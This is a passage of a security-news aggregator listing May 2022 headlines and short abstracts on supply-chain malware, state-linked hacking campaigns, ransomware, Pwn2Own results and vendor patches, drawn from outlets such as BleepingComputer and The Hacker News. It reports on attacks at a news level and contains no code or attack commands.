PyPI module 'ctx' that gets downloaded over 20,000 times a week has been compromised in a software supply chain attack with malicious versions stealing the developer's environment variables. Additionally, versions of a 'phpass' fork published to the PHP/Composer package repository Packagist had been altered to steal secrets.BleepingComputer
May 23, 2022 – APT
Russia-linked Turla APT targets Austria, Estonia, and NATO platform Full Text
Abstract
Russia-linked APT group Turla was observed targeting the Austrian Economic Chamber, a NATO eLearning platform, and the Baltic Defense College. Researchers from SEKOIA.IO Threat & Detection Research (TDR) team have uncovered a reconnaissance...Security Affairs
May 23, 2022 – Attack
General Motors credential stuffing attack exposes car owners info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022 – Breach
GM credential stuffing attack exposed car owners’ personal info Full Text
Abstract
US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed customer information and allowed hackers to redeem rewards points for gift cards.BleepingComputer
May 23, 2022 – General
Blockchain bridge Wormhole pays record $10m bug bounty reward Full Text
Abstract
An attacker exploiting the vulnerability “could have held the entire protocol [to] ransom with the threat that the Ethereum Wormhole bridge would be bricked, and all the funds residing in that contract lost forever,” according to a PoC on GitHub.The Daily Swig
May 23, 2022 – General
Yes, Containers Are Terrific, But Watch the Security Risks Full Text
Abstract
Containers revolutionized the development process, acting as a cornerstone for DevOps initiatives, but containers bring complex security risks that are not always obvious. Organizations that don't mitigate these risks are vulnerable to attack. In this article, we outline how containers contributed to agile development, which unique security risks containers bring into the picture – and what organizations can do to secure containerized workloads, going beyond DevOps to achieve DevSecOps . Why did containers catch on so fast? Containers are, in many ways, the evolution of virtualization. The goal was to speed up the development process, creating a more agile route from development through to testing and implementation – a method that's more lightweight than using full-blown virtual machines, anyway. At the core of this issue is application compatibility, as applications require certain versions of libraries – which could clash with the requirements of other applications. ContainerThe Hacker News
May 23, 2022 – Botnet
Russia-linked Fronton botnet could run disinformation campaigns Full Text
Abstract
Researchers warn that the Fronton botnet was used by Russia-linked threat actors for coordinated disinformation campaigns. Fronton is a distributed denial-of-service (DDoS) botnet that was used by Russia-linked threat actors for coordinated disinformation...Security Affairs
May 23, 2022 – General
Cybercrime Getting More Sophisticated: How to Protect Your Business? Full Text
Abstract
Attackers continuously expand their capabilities and take advantage of limited cybersecurity awareness among businesses. With multiple attack vectors, they sabotage or bypass the victim’s security strengths while targeting their weaknesses. Hence it is more crucial than ever to have a Next-gen WAF.Threatpost
May 23, 2022 – Malware
Fake Windows exploits target infosec community with Cobalt Strike Full Text
Abstract
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.BleepingComputer
May 23, 2022 – Vulnerabilities
Yik Yak fixes information disclosure bug that leaked users’ GPS location Full Text
Abstract
‘Anonymous’ social network Yik Yak took more than three months to address vulnerabilities which meant it wasn’t anonymous at all, despite reports from two different security researchers.The Daily Swig
May 23, 2022 – Disinformation
Fronton: Russian IoT Botnet Designed to Run Social Media Disinformation Campaigns Full Text
Abstract
Fronton, a distributed denial-of-service (DDoS) botnet that came to light in March 2020, is much more powerful than previously thought, per the latest research. "Fronton is a system developed for coordinated inauthentic behavior on a massive scale," threat intelligence firm Nisos said in a report published last week. "This system includes a web-based dashboard known as SANA that enables a user to formulate and deploy trending social media events en masse. The system creates these events that it refers to as Инфоповоды, 'newsbreaks,' utilizing the botnet as a geographically distributed transport." The existence of Fronton, an IoT botnet, became public knowledge following revelations from BBC Russia and ZDNet in March 2020 after a Russian hacker group known as Digital Revolution published documents that it claimed were obtained after breaking into a subcontractor to the FSB, the Federal Security Service of the Russian Federation. Further investigatThe Hacker News
May 23, 2022 – Vulnerabilities
A flaw in PayPal can allow attackers to steal money from users’ account Full Text
Abstract
A security researcher announced the discovery of an unpatched flaw in PayPal that could allow attackers to steal money from users. TheHackerNews first reported that a security researcher (that goes online with the moniker h4x0r_dz) has discovered...Security Affairs
May 23, 2022 – Phishing
Photos of abused victims used in new ID verification scam Full Text
Abstract
Scammers are now leveraging dating apps like Tinder and Grindr to pose themselves as former victims of physical abuse to gain your trust and sympathy and sell you "ID verification" services. BleepingComputer came across multiple instances of users on online dating apps being approached by these catfishing profiles.BleepingComputer
May 23, 2022 – Government
South Korea and US agree to cooperate on combating on North Korea’s cyber-offensives Full Text
Abstract
Last month, the US government offered a reward of up to $5 million for information to disrupt North Korea's cryptocurrency theft, cyber-espionage, and other illicit state-backed activities.The Register
May 23, 2022 – Vulnerabilities
New Unpatched Bug Could Let Attackers Steal Money from PayPal Users Full Text
Abstract
A security researcher claims to have discovered an unpatched vulnerability in PayPal's money transfer service that could allow attackers to trick victims into unknowingly completing attacker-directed transactions with a single click. Clickjacking, also called UI redressing, refers to a technique wherein an unwitting user is tricked into clicking seemingly innocuous webpage elements like buttons with the goal of downloading malware, redirecting to malicious websites, or disclose sensitive information. This is typically achieved by displaying an invisible page or HTML element on top of the visible page, resulting in a scenario where users are fooled into thinking that they are clicking the legitimate page when they are in fact clicking the rogue element overlaid atop it. "Thus, the attacker is 'hijacking' clicks meant for [the legitimate] page and routing them to another page, most likely owned by another application, domain, or both," security researcher h4x0rThe Hacker News
May 23, 2022 – Privacy
Cytrox’s Predator spyware used zero-day exploits in 3 campaigns Full Text
Abstract
Google's Threat Analysis Group (TAG) uncovered campaigns targeting Android users with five zero-day vulnerabilities. Google's Threat Analysis Group (TAG) researchers discovered three campaigns, between August and October 2021, targeting Android users...Security Affairs
May 23, 2022 – General
Hackers can hack your online accounts before you even register them Full Text
Abstract
Security researchers have revealed that hackers can hijack your online accounts before you even register them by exploiting flaws that have been already been fixed on popular websites, including Instagram, LinkedIn, Zoom, WordPress, and Dropbox.BleepingComputer
May 23, 2022 – Attack
Threat Actors Target the Infosec Community with Fake PoC Exploits Full Text
Abstract
An account was found sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809 CVSS 9.8). The malware, disguised as a fake PoC code, was available on GitHub.Security Affairs
May 23, 2022 – Hacker
Threat actors target the infoSec community with fake PoC exploits Full Text
Abstract
Researchers uncovered a malware campaign targeting the infoSec community with fake Proof Of Concept to deliver a Cobalt Strike beacon. Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert...Security Affairs
May 23, 2022 – Criminals
New RansomHouse group sets up extortion market, adds first victims Full Text
Abstract
Yet another data-extortion cybercrime operation has appeared on the darknet named 'RansomHouse' where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment.BleepingComputer
May 23, 2022 – Malware
Mirai Malware for Linux Double Down on Stronger Chips Full Text
Abstract
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds.Crowdstrike
May 23, 2022 – Attack
Russian hackers perform reconnaissance against Austria, Estonia Full Text
Abstract
In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College.BleepingComputer
May 22, 2022 – Criminals
Chinese “Twisted Panda” Hackers Caught Spying on Russian Defense Institutes Full Text
Abstract
At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed " Twisted Panda ," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents. Israeli cybersecurity firm Check Point, which disclosed details of the latest intelligence-gathering operation, attributed it a Chinese threat actor, with connections to that of Stone Panda (aka APT 10 , Cicada, or Potassium) and Mustang Panda (aka Bronze President, HoneyMyte, or RedDelta). CallinThe Hacker News
May 22, 2022 – Deepfake
Elon Musk deep fakes promote new BitVex cryptocurrency scam Full Text
Abstract
Cryptocurrency scammers are using deep fake videos of Elon Musk and other prominent cryptocurrency advocates to promote a BitVex trading platform scam that steals deposited currency.BleepingComputer
May 22, 2022 – Deepfake
Elon Musk deep fakes promote new cryptocurrency scam Full Text
Abstract
Cryptocurrency scammers are using deep fake videos of Elon Musk and other prominent cryptocurrency advocates to promote a BitVex trading platform scam that steals deposited currency.BleepingComputer
May 22, 2022 – General
Security Affairs newsletter Round 366 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
May 22, 2022 – Malware
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware Full Text
Abstract
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.BleepingComputer
May 22, 2022 – APT
North Korea-linked Lazarus APT uses Log4J to target VMware servers Full Text
Abstract
North Korea-linked Lazarus APT is exploiting the Log4J remote code execution (RCE) in attacks aimed at VMware Horizon servers. North Korea-linked group Lazarus is exploiting the Log4J RCE vulnerability (CVE-2021-44228) to compromise VMware Horizon...Security Affairs
May 22, 2022 – Privacy
Google: Predator spyware infected Android devices using zero-days Full Text
Abstract
Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox.BleepingComputer
May 22, 2022 – General
The Pwn2Own Vancouver 2022: Trend Micro and ZDI awarded $1,155,000 Full Text
Abstract
The Pwn2Own Vancouver 2022 hacking contest ended, Trend Micro and ZDI awarded a total of $1,155,000 for successful attempts! During the third day of the Pwn2Own Vancouver 2022 hacking competition, white hat hackers demonstrated a working exploit...Security Affairs
May 21, 2022 – Criminals
New Details About Wizard Spider Emerge Full Text
Abstract
First detected in 2017, Wizard Spider has come a long way. A recent investigation by Prodaft revealed that the gang is one of the wealthiest ones and its assets exceed hundreds of millions of dollars.Cyware Alerts - Hacker News
May 21, 2022 – General
The Emergence of Physically Mediated Cyberattacks? Full Text
Abstract
Physical violence against personnel in lawless environments as an element of cyberattack is another dimension of cyber conflict, and its importance has been neglected for way too long.Lawfare
May 21, 2022 – Policy and Law
India to press ahead with strict cybersecurity rules despite industry concerns Full Text
Abstract
Despite growing industry concerns, India will not change upcoming cybersecurity rules that force social media, technology companies, and cloud service providers to report data breaches swiftly.The Indian Express
May 21, 2022 – Breach
Ransomware attack exposes data of 500,000 Chicago students Full Text
Abstract
The Chicago Public Schools has suffered a massive data breach that exposed the data of almost 500,000 students and 60,000 employee after their vendor, Battelle for Kids, suffered a ransomware attack in December.BleepingComputer
May 21, 2022 – Attack
Asian media company Nikkei suffered a ransomware attack Full Text
Abstract
The media company Nikkei has disclosed a ransomware attack and revealed that the incident might have impacted customer data. The Japanese-based media company Nikkey is focused on the business and financial industry, it is the world's largest financial...Security Affairs
May 21, 2022 – Malware
Malicious PyPI package opens backdoors on Windows, Linux, and Macs Full Text
Abstract
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems.BleepingComputer
May 21, 2022 – APT
Russia-linked Sandworm continues to conduct attacks against Ukraine Full Text
Abstract
Security researchers from ESET reported that the Russia-linked APT group Sandworm continues to target Ukraine. Security experts from ESET reported that the Russia-linked cyberespionage group Sandworm continues to launch cyber attacks against entities...Security Affairs
May 21, 2022 – Vulnerabilities
Windows 11 hacked three more times on last day of Pwn2Own contest Full Text
Abstract
On the third and last day of the 2022 Pwn2Own Vancouver hacking contest, security researchers successfully hacked Microsoft's Windows 11 operating system three more times using zero-day exploits.BleepingComputer
May 21, 2022 – Vulnerabilities
Cisco fixes an IOS XR flaw actively exploited in the wild Full Text
Abstract
Cisco addressed a medium-severity vulnerability affecting IOS XR Software, the company warns that the flaw is actively exploited in the wild. Cisco released security updates to address a medium-severity vulnerability affecting IOS XR Software, tracked...Security Affairs
May 21, 2022 – General
A year after report, task force urges U.S. to keep ransomware on front burner Full Text
Abstract
The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force.CyberScoop
May 21, 2022 – Denial Of Service
The activity of the Linux XorDdos bot increased by 254% over the last six months Full Text
Abstract
XorDdos leverages persistence mechanisms, efficient evasion, and anti-forensic techniques, including obfuscating the malware’s activities, evading rule-based detection mechanisms, and hash-based malicious file lookup.Security Affairs
May 21, 2022 – Vulnerabilities
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices Full Text
Abstract
Taiwanese vendor QNAP is asking users to install the latest update on their NAS devices and avoid exposing them on the Internet. The company issued the alert in response to a new wave of DeadBolt ransomware attacks targeting NAS devices.Security Affairs
May 21, 2022 – Vulnerabilities
Microsoft’s out-of-band patch fixes Windows AD authentication failures Full Text
Abstract
Microsoft has released an out-of-band patch to fix authentication failures on Windows after installing the May 10, 2022 security update on Windows Server domain controllers.ZDNet
May 20, 2022 – Ransomware
The Week in Ransomware - May 20th 2022 - Another one bites the dust Full Text
Abstract
Ransomware attacks continue to slow down, likely due to the invasion of Ukraine, instability in the region, and subsequent worldwide sanctions against Russia.BleepingComputer
May 20, 2022 – Malware
Researchers Find Backdoor in School Management Plugin for WordPress Full Text
Abstract
Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites. The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity. The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up. School Management, developed by an India-based company called Weblizar , is billed as a Wordpress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins. The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of tThe Hacker News
May 20, 2022 – Attack
QNAP warns of a new wave of DeadBolt ransomware attacks against its NAS devices Full Text
Abstract
Taiwanese vendor QNAP warned customers of a new wave of DeadBolt ransomware attacks and urges them to install the latest updates. Taiwanese vendor QNAP is asking users to install the latest update on their NAS devices and avoid exposing them on the Internet. The...Security Affairs
May 20, 2022 – General
Executives’ Personal Digital Lives are the Soft-Underbelly of Enterprise Security Full Text
Abstract
Cybercriminals are attacking executives and board members in their personal digital lives. This adds additional risk to the enterprise, and is a problem that CISOs and security teams cannot solve.Threatpost
May 20, 2022 – Vulnerabilities
Cisco urges admins to patch IOS XR zero-day exploited in attacks Full Text
Abstract
Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely gain access to Redis instances running in NOSi Docker containers.BleepingComputer
May 20, 2022 – Vulnerabilities
Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild Full Text
Abstract
Cisco on Friday rolled out fixes for a medium-severity vulnerability affecting IOS XR Software that it said has been exploited in real-world attacks. Tracked as CVE-2022-20821 (CVSS score: 6.5), the issue relates to an open port vulnerability that could be abused by an unauthenticated, remote attacker to connect to a Redis instance and achieve code execution. "A successful exploit could allow the attacker to write to the Redis in-memory database, write arbitrary files to the container filesystem, and retrieve information about the Redis database," Cisco said in an advisory. "Given the configuration of the sandboxed container that the Redis instance runs in, a remote attacker would be unable to execute remote code or abuse the integrity of the Cisco IOS XR Software host system." The flaw, which it said was identified during the resolution of a technical assistance center (TAC) case, impacts Cisco 8000 Series routers running IOS XR Software that has the healthThe Hacker News
May 20, 2022 – General
Pwn2Own Vancouver 2022 D2 Full Text
Abstract
During the second day of the Pwn2Own Vancouver 2022 hacking competition, contestants demonstrated a working exploit for Microsoft Windows 11. During the second day of the Pwn2Own Vancouver 2022 hacking competition, white hat hackers demonstrated a working...Security Affairs
May 20, 2022 – Malware
Backdoor baked into premium school management plugin for WordPress Full Text
Abstract
Security researchers have discovered a backdoor in a premium WordPress plugin built as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating.BleepingComputer
May 20, 2022 – Malware
Microsoft Warns Rise in XorDdos Malware Targeting Linux Devices Full Text
Abstract
A Linux botnet malware known as XorDdos has witnessed a 254% surge in activity over the last six months, according to latest research from Microsoft. The trojan, so named for carrying out denial-of-service attacks on Linux systems and its use of XOR-based encryption for communications with its command-and-control (C2) server, is known to have been active since at least 2014. "XorDdos' modular nature provides attackers with a versatile trojan capable of infecting a variety of Linux system architectures," Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or of the Microsoft 365 Defender Research Team said in an exhaustive deep-dive of the malware. "Its SSH brute-force attacks are a relatively simple yet effective technique for gaining root access over a number of potential targets." Remote control over vulnerable IoT and other internet-connected devices is gained by means of secure shell (SSH) brute-force attacks, enabling the malware to form a botnetThe Hacker News
May 20, 2022 – Attack
The activity of the Linux XorDdos bot increased by 254% over the last six months Full Text
Abstract
Microsoft researchers have observed a spike in the activity of the Linux bot XorDdos over the last six months. XORDDoS, also known as XOR.DDoS, first appeared in the threat landscape in 2014 it is a Linux Botnet that was employed in attacks...Security Affairs
May 20, 2022 – Vulnerabilities
Windows 11 hacked again at Pwn2Own, Telsa Model 3 also falls Full Text
Abstract
During the second day of the Pwn2Own Vancouver 2022 hacking competition, contestants hacked Microsoft's Windows 11 OS again and demoed zero-days in Tesla Model 3's infotainment system.BleepingComputer
May 20, 2022 – Privacy
Cytrox’s Predator Spyware Targeted Android Users with Zero-Day Exploits Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday pointed fingers at a North Macedonian spyware developer named Cytrox for developing exploits against five zero-day (aka 0-day) flaws, four in Chrome and one in Android, to target Android users. "The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem," TAG researchers Clement Lecigne and Christian Resell said . Cytrox is alleged to have packaged the exploits and sold them to different government-backed actors located in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain, and Indonesia, who, in turn, weaponized the bugs in at least three different campaigns. The commercial surveillance company is the maker of Predator , an implant analogous to that of NSO Group's Pegasus , and is known to havThe Hacker News
May 20, 2022 – General
Conti ransomware is shutting down operations, what will happen now? Full Text
Abstract
The Conti ransomware gang shut down its operation, and some of its administrators announced a branding of the gang. Advanced Intel researcher Yelisey Boguslavskiy announced the that Conti Ransomware gang shuts its infrastructure and some of its administrators...Security Affairs
May 20, 2022 – Denial Of Service
Russian Sberbank says it’s facing massive waves of DDoS attacks Full Text
Abstract
Sberbank's vice president and director of cybersecurity, Sergei Lebed, has told participants of the Positive Hack Days forum that the company is going through a period of unprecedented targeting by hackers.BleepingComputer
May 20, 2022 – Outage
K-12 school districts in New Mexico, Ohio crippled by cyberattacks Full Text
Abstract
This week, the Cl0p ransomware group’s leak site displayed sensitive information from students, faculty members, and parents from Fort Sumner Municipal Schools. The leak included scans of driver’s licenses and more.The Record
May 20, 2022 – Attack
Researchers Uncover Rust Supply Chain Attack Targeting Cloud CI Pipelines Full Text
Abstract
A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack " CrateDepression ." Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers will accidentally download the malicious package instead of the legitimate library. In this case, the crate in question is "rustdecimal," a typosquat of the real " rust_decimal " package that's been downloaded over 3.5 million times to date. The package was flagged earlier this month on May 3 by Askar Safin, a Moscow-based developer. According to an advisory published by the Rust maintainers, the crate is said to have been first pushed on March 25, 2022, attracting fewer than 500 downloads before it was permanently removed from the repository.The Hacker News
May 20, 2022 – General
Canada bans Huawei and ZTE from 5G networks over security concerns Full Text
Abstract
The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks.BleepingComputer
May 20, 2022 – Malware
Dridex Infection Chain Case Studies Full Text
Abstract
Recently, during December 2021, Unit 42 researchers received various Dridex samples, which were exploiting XLL and XLM 4.0 in combination with Discord and OneDrive to download the final payload.Palo Alto Networks
May 20, 2022 – Attack
Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor Full Text
Abstract
The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart. "The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report. The intrusions are said to have been first discovered in April, although multiple threat actors , including those aligned with China and Iran , have employed the same approach to further their objectives over the past few months. NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle . Some of the key functions of the bacThe Hacker News
May 20, 2022 – General
46% of organizations still store passwords in shared documents Full Text
Abstract
That’s despite an overwhelming 93% of respondents that require password management training, with 63% holding training more than once per year, according to a survey conducted by Pulse on behalf of Hitachi ID.Help Net Security
May 19, 2022 – Attack
Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware Full Text
Abstract
Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware. "The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network." Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11[.]com, win11-serv[.]com, and win11install[.]com, and ms-teams-app[.]net. In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware. The ISO file, for its part,The Hacker News
May 19, 2022 – Criminals
Conti ransomware shuts down operation, rebrands into smaller units Full Text
Abstract
The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.BleepingComputer
May 19, 2022 – Government
Legislation Promoting Cyber Collaboration Between DHS and States Awaits Biden Signature Full Text
Abstract
Having cleared the Senate in January, the State and Local Government Cybersecurity Act passed the House of Representatives Tuesday and now awaits President Joe Biden’s signature.Nextgov
May 19, 2022 – Vulnerabilities
New Bluetooth Hack Could Let Attackers Remotely Unlock Smart Locks and Cars Full Text
Abstract
A novel Bluetooth relay attack can let cybercriminals more easily than ever remotely unlock and operate cars , break open residential smart locks , and breach secure areas. The vulnerability has to do with weaknesses in the current implementation of Bluetooth Low Energy (BLE), a wireless technology used for authenticating Bluetooth devices that are physically located within a close range. "An attacker can falsely indicate the proximity of Bluetooth LE (BLE) devices to one another through the use of a relay attack," U.K.-based cybersecurity company NCC Group said . "This may enable unauthorized access to devices in BLE-based proximity authentication systems." Relay attacks , also called two-thief attacks, are a variation of person-in-the-middle attacks in which an adversary intercepts communication between two parties, one of whom is also an attacker, and then relays it to the target device without any manipulation. While various mitigations have been implemThe Hacker News
May 19, 2022 – General
Privacy Shield 2.0 —Third Time’s the Charm? Full Text
Abstract
What commitments has the United States made in the recent Trans-Atlantic Data Privacy Framework? And will those reforms be enough to pass muster when this next agreement goes before the Court of Justice for the European Union?Lawfare
May 19, 2022 – Vulnerabilities
Google OAuth client library flaw allowed to deploy of malicious payloads Full Text
Abstract
Google addressed a high-severity flaw in its OAuth client library for Java that could allow attackers with a compromised token to deploy malicious payloads. Google addressed a high-severity authentication bypass flaw in Google OAuth Client Library...Security Affairs
May 19, 2022 – Attack
Media giant Nikkei’s Asian unit hit by ransomware attack Full Text
Abstract
Publishing giant Nikkei disclosed that the group's headquarters in Singapore was hit by a ransomware attack almost one week ago, on May 13th.BleepingComputer
May 19, 2022 – Attack
Washington Local Schools hit with cyberattack Full Text
Abstract
The attack impacted the district's phones, email accounts, internet, WiFi networks, and Google Classroom. Currently, teachers do not have access to outgoing or incoming calls or emails.WTOL
May 19, 2022 – General
7 Key Findings from the 2022 SaaS Security Survey Report Full Text
Abstract
The 2022 SaaS Security Survey Report, in collaboration with CSA, examines the state of SaaS security as seen in the eyes of CISOs and security professionals in today's enterprises. The report gathers anonymous responses from 340 CSA members to examine not only the growing risks in SaaS security but also how different organizations are currently working to secure themselves. Demographics The majority (71%) of respondents were located in the Americas, another 17% from Asia, and 13% from EMEA. Of these participants 49% influence the decision-making process while 39% run the process itself. The survey examined organizations from a variety of industries, such as telecommunications (25%), finance (22%), and government (9%). While there are many takeaways from the survey, these are our top seven. 1: SaaS Misconfigurations are Leading to Security Incidents Since 2019, SaaS misconfigurations have become a top concern for organizations, with at least 43% of organizations reportingThe Hacker News
May 19, 2022 – General
Pwn2Own Vancouver 2022 D1: MS Teams exploits received $450,000 Full Text
Abstract
White hat hackers earned a total of $800,000 on the first day of the Pwn2Own Vancouver 2022, $450,000 for exploits targeting Microsoft Teams. Pwn2Own Vancouver 2022 hacking contest has begun, it is the 15th edition of this important event organized...Security Affairs
May 19, 2022 – Malware
Microsoft detects massive surge in Linux XorDDoS malware activity Full Text
Abstract
A stealthy and modular malware used to hack into Linux devices and build a DDoS botnet has seen a massive 254% increase in activity during the last six months, as Microsoft revealed today.BleepingComputer
May 19, 2022 – Government
Agencies Showcase Federal Cyber Progress, Outline Future Threats Full Text
Abstract
Lawmakers explored courses of action to help bolster and secure the federal government’s digital networks, primarily through ongoing security software implementation and steady federal funding to protect sensitive U.S. data.Nextgov
May 19, 2022 – Vulnerabilities
High-Severity Bug Reported in Google’s OAuth Client Library for Java Full Text
Abstract
Google last month addressed a high-severity flaw in its OAuth client library for Java that could be abused by a malicious actor with a compromised token to deploy arbitrary payloads. Tracked as CVE-2021-22573 , the vulnerability is rated 8.7 out of 10 for severity and relates to an authentication bypass in the library that stems from an improper verification of the cryptographic signature. Credited with discovering and reporting the flaw on March 12 is Tamjid Al Rahat , a fourth-year Ph.D. student of Computer Science at the University of Virginia, who has been awarded $5,000 as part of Google's bug bounty program. "The vulnerability is that the IDToken verifier does not verify if the token is properly signed," an advisory for the flaw reads. "Signature verification makes sure that the token's payload comes from a valid provider, not from someone else. An attacker can provide a compromised token with custom payload. The token will pass the validation onThe Hacker News
May 19, 2022 – APT
China-linked Space Pirates APT targets the Russian aerospace industry Full Text
Abstract
A new China-linked cyberespionage group known as 'Space Pirates' is targeting enterprises in the Russian aerospace industry. A previously unknown Chinese cyberespionage group, tracked as 'Space Pirates', targets enterprises in the Russian aerospace...Security Affairs
May 19, 2022 – Policy and Law
U.S. DOJ will no longer prosecute ethical hackers under CFAA Full Text
Abstract
The U.S. Department of Justice (DOJ) has announced a revision of its policy on how federal prosecutors should charge violations of the Computer Fraud and Abuse Act (CFAA), carving out "good-fath" security research from being prosecuted.BleepingComputer
May 19, 2022 – Vulnerabilities
Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw Full Text
Abstract
A critical vulnerability in Flux2, the continuous delivery (CD) tool for Kubernetes, can enable rogue tenants in multi-tenancy deployments to sabotage ‘neighbors’ using the same off-premise infrastructure.The Daily Swig
May 19, 2022 – Government
CISA orders federal agencies to fix VMware CVE-2022-22972 and CVE-2022-22973 flaws Full Text
Abstract
CISA orders federal agencies to fix VMware CVE-2022-22972 and CVE-2022-22973 vulnerabilities by May 23, 2022. The Cybersecurity and Infrastructure Security Agency (CISA) issued the Emergency Directive 22-03 to order federal agencies to fix VMware...Security Affairs
May 19, 2022 – Hacker
Lazarus hackers target VMware servers with Log4Shell exploits Full Text
Abstract
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.BleepingComputer
May 19, 2022 – Vulnerabilities
Critical Flaws in Jupiter WordPress Plugin Full Text
Abstract
WordPress researchers unearthed a set of flaws in the Jupiter Theme and JupiterX Core plugins for the WordPress CMS, including a high-severity flaw that allows a third party to gain administrative privileges and completely take over a live site. Users are recommended to keep their machines up-to-da ... Read MoreCyware Alerts - Hacker News
May 19, 2022 – Phishing
Phishing websites now use chatbots to steal your credentials Full Text
Abstract
Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors.BleepingComputer
May 19, 2022 – Attack
New Wave of Brute-Force Attacks Target SQL Servers - Microsoft Warns Full Text
Abstract
Microsoft uncovered a malicious campaign targeting SQL servers using a malware dubbed SuspSQLUsage. Attackers leverage a built-in PowerShell binary to achieve persistence on compromised systems. However, for initial compromise, they rely on brute-force tactics. It is recommended to monitor for ... Read MoreCyware Alerts - Hacker News
May 19, 2022 – Breach
Microsoft Teams, Windows 11 hacked on first day of Pwn2Own Full Text
Abstract
During the first day of Pwn2Own Vancouver 2022, contestants won $800,000 after successfully exploiting 16 zero-day bugs to hack multiple products, including Microsoft's Windows 11 operating system and the Teams communication platform.BleepingComputer
May 19, 2022 – Phishing
Phishers Add Chatbot to the Phishing Lure Full Text
Abstract
Researchers have discovered a new approach being taken by phishers to increase victim engagement and confidence: the addition of an interactive chatbot. The phishers hope that this will help lower the attention of the target victim.Security Week
May 19, 2022 – Attack
QNAP alerts NAS customers of new DeadBolt ransomware attacks Full Text
Abstract
Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads.BleepingComputer
May 19, 2022 – Botnet
Russia-linked Fronton Botnet Goes Beyond Just DDoS attacks at Scale Full Text
Abstract
An investigation into the Fronton botnet has revealed far more than the ability to perform DDoS attacks, with the exposure of coordinated inauthentic behavior "on a massive scale."ZDNet
May 19, 2022 – Criminals
Ransomware gangs rely more on weaponizing vulnerabilities Full Text
Abstract
Security researchers are warning that external remote access services continue to be the main vector for ransomware gangs to breach company networks.BleepingComputer
May 18, 2022 – Privacy
Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit Full Text
Abstract
